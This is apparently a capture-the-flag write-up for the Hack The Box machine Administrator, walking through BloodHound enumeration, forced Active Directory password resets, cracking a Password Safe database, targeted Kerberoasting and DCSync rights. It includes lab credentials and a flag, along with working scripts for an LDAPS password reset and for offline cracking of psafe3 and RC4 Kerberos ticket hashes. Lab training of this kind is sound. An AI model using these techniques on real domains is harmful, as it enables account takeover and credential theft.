Administrator is a medium-difficulty machine from Hack The Box where we are given credentials up front, in an assumed-breach approach. We begin with BloodHound enumeration, abuse a GenericAll -> ForceChangePassword chain to reach a user who can read an FTP share, recover credentials from a Password Safe database found there, use one of those accounts for a targeted Kerberoasting attack, and end up with a user holding DCSync rights, which lets us dump the domain hashes and become Administrator.
```text
PS C:\Users\0xkujen> nmap -A -Pn 10.129.207.232
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-11 20:07 W. Central Africa Standard Time
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.90% done; ETC: 20:11 (0:03:09 remaining)
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 23.03% done; ETC: 20:11 (0:03:07 remaining)
Nmap scan report for 10.129.207.232
Host is up (0.59s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-12 02:14:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 261.69 seconds
```
Kerberos (88), LDAP (389/636), the global catalog (3268/3269), DNS (53) and the Service Info line (Host: DC) all point to a domain controller. Two details are worth keeping in mind. First, the Kerberos banner reports a server time of 02:14Z while our scan started at 20:07 UTC+1, so the DC's clock is several hours ahead of ours; Kerberos tolerates only a few minutes of skew, so any Kerberos authentication will need our clock synced to the DC (NTLM is unaffected). Second, a Microsoft FTP service is listening on port 21, which is unusual on a DC and worth a look later.
We were also given user credentials, as in an assumed-breach engagement:

Username: Olivia
Password: ichliebedich
Since we have credentials, we start with BloodHound enumeration using bloodhound-python:

```text
┌──(kali㉿kali)-[~]
└─$ bloodhound-python -c All -u Olivia -p 'ichliebedich' -d Administrator.htb -ns 10.129.207.232 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno 111] Connection refused
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250418105826_bloodhound.zip
```

The collector first tries to obtain a Kerberos TGT and, when the connection to dc.administrator.htb:88 is refused, falls back to NTLM; the collection still completes over LDAP. Mapping dc.administrator.htb to the target in /etc/hosts (or naming the DC explicitly with -dc) avoids the warning.
Loading the zip into BloodHound shows that our user OLIVIA has GenericAll over MICHAEL, MICHAEL in turn has ForceChangePassword over BENJAMIN, and BENJAMIN is a member of SHARE MODERATORS. GenericAll is full control of the object; ForceChangePassword is the narrower User-Force-Change-Password extended right, which GenericAll includes. Either one lets us reset the target's password without knowing the current one, so both hops of the chain are password resets.
OLIVIA is also a member of Remote Management Users, so we open a WinRM session as her with evil-winrm and use the GenericAll right to reset MICHAEL's password to one of our choosing:
MICHAEL is a member of Remote Management Users as well, so we can log in with the new password over evil-winrm:
```text
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i administrator.htb -u michael -p 'NewPasswordKujen123!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
*Evil-WinRM* PS C:\Users\michael\Documents>
```
Since MICHAEL has ForceChangePassword over BENJAMIN, we repeat the same reset from MICHAEL's session and set a new password for BENJAMIN:
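The reset itself is the same operation in both hops (OLIVIA over MICHAEL, MICHAEL over BENJAMIN). As an added example, not code from the original walkthrough, here it is as a script that performs the reset over LDAPS, which is what the GenericAll and ForceChangePassword rights actually authorize. It assumes the third-party ldap3 package for the live step, that dc.administrator.htb resolves to the target, and a lab DC with a self-signed certificate; the account names and passwords are the ones used in the walkthrough.

```python
# The password reset behind GenericAll / ForceChangePassword, done over LDAPS.
# Added illustration, not the author's code. It assumes the ldap3 package for
# the live step (pip install ldap3) and a lab DC with a self-signed certificate.
import ssl
import sys


def unicode_pwd_value(new_password: str) -> bytes:
    """AD accepts a write to unicodePwd only as the password wrapped in double
    quotes and encoded UTF-16-LE; anything else fails with unwillingToPerform,
    as does any write that does not arrive over TLS (LDAPS or StartTLS)."""
    return ('"' + new_password + '"').encode("utf-16-le")


def domain_to_base_dn(domain: str) -> str:
    """administrator.htb -> DC=administrator,DC=htb"""
    return ",".join(f"DC={label}" for label in domain.split("."))


def reset_password(dc: str, domain: str, actor: str, actor_pw: str,
                   target_sam: str, new_password: str) -> bool:
    """Bind as `actor` over LDAPS, find `target_sam` and REPLACE its unicodePwd.
    A reset is a single REPLACE; a self-service *change* would be DELETE old +
    ADD new and needs the current password, which is exactly what these rights avoid."""
    from ldap3 import MODIFY_REPLACE, NTLM, Connection, Server, Tls  # third-party dependency
    from ldap3.utils.conv import escape_filter_chars

    server = Server(dc, port=636, use_ssl=True, tls=Tls(validate=ssl.CERT_NONE))  # lab DC only
    conn = Connection(server, user=f"{domain}\\{actor}", password=actor_pw,
                      authentication=NTLM, auto_bind=True)
    base_dn = domain_to_base_dn(domain)
    conn.search(base_dn, f"(sAMAccountName={escape_filter_chars(target_sam)})",
                attributes=["distinguishedName"])
    if not conn.entries:
        print(f"[-] {target_sam} not found under {base_dn}")
        return False
    target_dn = conn.entries[0].entry_dn
    ok = conn.modify(target_dn, {"unicodePwd": [(MODIFY_REPLACE, [unicode_pwd_value(new_password)])]})
    print(f"[{'+' if ok else '-'}] {target_dn}: {conn.result['description']}")
    conn.unbind()
    return ok


if __name__ == "__main__":
    # python3 reset_pw.py dc.administrator.htb administrator.htb Olivia ichliebedich michael 'NewPasswordKujen123!'
    if len(sys.argv) != 7:
        sys.exit("usage: reset_pw.py <dc> <domain> <actor> <actor_password> <target> <new_password>")
    sys.exit(0 if reset_password(*sys.argv[1:]) else 1)
```

ldap3 also wraps the same REPLACE in `conn.extend.microsoft.modify_password(target_dn, new_password)`; the explicit form above is kept so the quoting and UTF-16-LE encoding are visible, because that encoding is the usual reason a hand-written reset is rejected. Tools such as `net rpc password` (over SAMR) or `Set-ADAccountPassword -Reset` from the evil-winrm session exercise the same right by a different protocol.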
BloodHound showed BENJAMIN in the SHARE MODERATORS group. The name suggests file-share access, and the only file service in the port scan is the FTP server on port 21, so we try it with BENJAMIN's new credentials:
```text
┌──(kali㉿kali)-[~]
└─$ ftp benjamin@administrator.htb
Connected to administrator.htb.localdomain.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||54695|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||54696|)
125 Data connection already open; Transfer starting.
100% |****************************************************************************************************|   952        4.62 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (3.64 KiB/s)
```
The guess was right: the share holds Backup.psafe3, a Password Safe V3 database. One caveat on the transfer: ftp defaulted to ASCII mode and warned about bare linefeeds. A .psafe3 file is binary, so a mangled copy would make the next step fail silently. Here 952 bytes arrived for a 952-byte file and the hash cracks, but the safe habit is to issue `binary` before `get`.

The database is protected by a master password, so we extract its hash with pwsafe2john and crack it with John the Ripper:
```text
┌──(kali㉿kali)-[~]
└─$ pwsafe2john Backup.psafe3 > backup.hash

┌──(kali㉿kali)-[~]
└─$ john -w=/usr/share/wordlists/rockyou.txt backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
No password hashes left to crack (see FAQ)

┌──(kali㉿kali)-[~]
└─$ john backup.hash --show
Backu:tekieromucho

1 password hash cracked, 0 left
```
John reports "No password hashes left to crack" because this hash was already in its pot file from an earlier run; `--show` prints the stored result, tekieromucho. With the master password we open the safe in pwsafe, which holds stored credentials, among them emily's password.
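To make concrete what pwsafe2john pulls out of the file and what john then does per candidate, here is an added example (not the author's code) that parses the Password Safe V3 header, performs the format's key stretching and tests a small wordlist. The header is constructed in the script from a known master password rather than read from Backup.psafe3, so it runs offline.

```python
# The Password Safe V3 header that pwsafe2john copies into its hash line, and
# the check john repeats for every candidate. Added illustration, not the
# author's code; the header is constructed here from a known master password
# instead of being read from Backup.psafe3.
import hashlib
import os
import struct
from typing import Optional

HEADER_LEN = 4 + 32 + 4 + 32  # TAG | SALT | ITER | H(P')


def stretch_key(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Key stretching from the V3 format spec: X0 = SHA256(P || SALT), Xi = SHA256(X(i-1))."""
    x = hashlib.sha256(passphrase + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def parse_header(blob: bytes) -> dict:
    # "PWS3" | SALT[32] | ITER (uint32 little-endian) | H(P') = SHA256(P')[32] | encrypted records...
    if len(blob) < HEADER_LEN or blob[:4] != b"PWS3":
        raise ValueError("not a Password Safe V3 database")
    (iterations,) = struct.unpack("<I", blob[36:40])
    return {"salt": blob[4:36], "iterations": iterations, "hp": blob[40:72]}


def check_master_password(header: dict, candidate: str) -> bool:
    """H(P') is stored in the clear, so a candidate is tested without decrypting any record."""
    p_prime = stretch_key(candidate.encode(), header["salt"], header["iterations"])
    return hashlib.sha256(p_prime).digest() == header["hp"]


def crack(blob: bytes, wordlist) -> Optional[str]:
    header = parse_header(blob)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if check_master_password(header, word):
            return word
    return None


def build_header(master_password: str, iterations: int = 2048, salt: Optional[bytes] = None) -> bytes:
    """Constructed sample header (a real file continues with the encrypted records)."""
    salt = salt or os.urandom(32)
    hp = hashlib.sha256(stretch_key(master_password.encode(), salt, iterations)).digest()
    return b"PWS3" + salt + struct.pack("<I", iterations) + hp


if __name__ == "__main__":
    sample = build_header("tekieromucho")
    print(crack(sample, ["123456", "password", "tekieromucho", "letmein"]))
```

Each candidate costs ITER + 2 SHA-256 computations, so the iteration count stored in the header (the format requires at least 2048, and pwsafe lets the user raise it) directly sets the cracking rate; the "SHA256 128/128 AVX 4x" label in john's output above is this loop vectorised. Salt, iteration count and H(P') are all the cracker needs, which is why pwsafe2john never has to touch the encrypted records.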
BloodHound shows that emily is also a member of Remote Management Users, so we connect with the password from the safe and read the user flag:
```text
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cat ../desktop/user.txt
abb3ce3ab32dbac6bd5124d2ce4f1f6e
*Evil-WinRM* PS C:\Users\emily\Documents>
```
Privilege Escalation to Administrator - Kerberoasting
With emily's credentials we can run a targeted Kerberoast using the targetedKerberoast script. Unlike a classic Kerberoast, which only collects tickets for accounts that already have an SPN, the targeted variant writes a temporary servicePrincipalName onto every user the current account has write access to, requests an RC4-HMAC (etype 23) service ticket for it, prints the ticket in john/hashcat format and removes the SPN again. Two things to keep in mind: the SPN write is a directory modification that leaves an audit trail, and if the script is interrupted between the add and the remove, the SPN stays behind. Running it as emily produces one hash, for ethan:
```text
┌──(kali㉿kali)-[~/Hackthebox/Administrator/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'Administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$b71d0716274a7443c90e8ea360829a6a$...
[VERBOSE] SPN removed successfully for (ethan)

┌──(kali㉿kali)-[~/Hackthebox/Administrator]
└─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.ethan
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)
1g 0:00:00:00 DONE (2024-11-11 22:13) 16.66g/s 85333p/s 85333c/s 85333C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
So, using emily's write access, we Kerberoasted ethan and cracked his password: limpbizkit. The ticket is encrypted with a key derived from ethan's own password (his NT hash, for etype 23), which is the whole reason a service ticket can be cracked offline.
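To show what is inside that `$krb5tgs$23$` line and what john's "MD4 HMAC-MD5 RC4" label means, here is an added example (not the author's code and not the tool's) that builds an RC4-HMAC ticket from a known password and then cracks it the way john does. The ticket plaintext is a short constructed stand-in for the real DER-encoded EncTicketPart, and MD4 is implemented by hand because hashlib on OpenSSL 3 usually has no md4.

```python
# What a $krb5tgs$23$ line carries and how one candidate password is tested.
# Added illustration, not the author's or targetedKerberoast's code: the ticket
# is constructed here from a known password; MD4 is hand-rolled for portability.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120 key usage number for a ticket's enc-part

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (the NT hash is MD4 over the UTF-16-LE password)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, message-word order, shifts)
        (f, 0, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, w in enumerate(order):
                a = rotl((a + func(b, c, d) + x[w] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(nt: bytes, plaintext: bytes, confounder: bytes = b""):
    """RFC 4757 encryption keyed by the service account's NT hash.
    Returns (checksum, ciphertext): exactly the two hex fields of the hash line."""
    k1 = hmac_md5(nt, struct.pack("<I", KEY_USAGE_TICKET))
    data = (confounder or os.urandom(8)) + plaintext  # 8-byte random confounder first
    checksum = hmac_md5(k1, data)
    return checksum, rc4(hmac_md5(k1, checksum), data)  # K3 = HMAC(K1, checksum)

def krb5tgs_check(nt: bytes, checksum: bytes, ciphertext: bytes) -> bool:
    """One candidate: rebuild K1 and K3 from the candidate NT hash, decrypt,
    and see whether the HMAC of the result matches the checksum in the ticket."""
    k1 = hmac_md5(nt, struct.pack("<I", KEY_USAGE_TICKET))
    plain = rc4(hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(hmac_md5(k1, plain), checksum)

def crack_krb5tgs(hash_line: str, wordlist):
    # "$krb5tgs$23$*user$REALM$spn*$<checksum hex>$<ciphertext hex>": the label between the
    # asterisks is informational; only the last two fields take part in the check.
    head, checksum_hex, cipher_hex = hash_line.rsplit("$", 2)
    if not head.startswith("$krb5tgs$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    checksum, ciphertext = bytes.fromhex(checksum_hex), bytes.fromhex(cipher_hex)
    for word in wordlist:
        if krb5tgs_check(nt_hash(word.rstrip("\r\n")), checksum, ciphertext):
            return word.rstrip("\r\n")
    return None

def build_sample_hash(service_password: str, user="ethan", realm="ADMINISTRATOR.HTB",
                      spn="Administrator.htb/ethan") -> str:
    """Constructed hash line; the plaintext is a short stand-in for the DER EncTicketPart."""
    checksum, ciphertext = rc4_hmac_encrypt(nt_hash(service_password), b"\x63\x82stand-in EncTicketPart")
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${ciphertext.hex()}"

if __name__ == "__main__":
    line = build_sample_hash("limpbizkit")
    print(crack_krb5tgs(line, ["123456", "newzealand", "limpbizkit", "babygrl"]))
```

Every candidate costs one MD4, three HMAC-MD5 calls and one RC4 pass over the ticket, with no salt and no iteration, which is why rockyou.txt finished in under a second above. AES tickets (`$krb5tgs$17$` and `$18$`) derive the key with salted PBKDF2 (4096 iterations by default) and crack orders of magnitude slower; the tool asking for etype 23 is what keeps the attack cheap, and it is the argument for removing RC4 from service accounts via msDS-SupportedEncryptionTypes and for long random service passwords such as gMSAs.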
Checking BloodHound once more, ethan has DCSync rights on the domain, that is, the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain object. An account holding both can ask the DC to replicate directory data, including password hashes, exactly as another domain controller would. We can therefore dump the domain secrets with his credentials: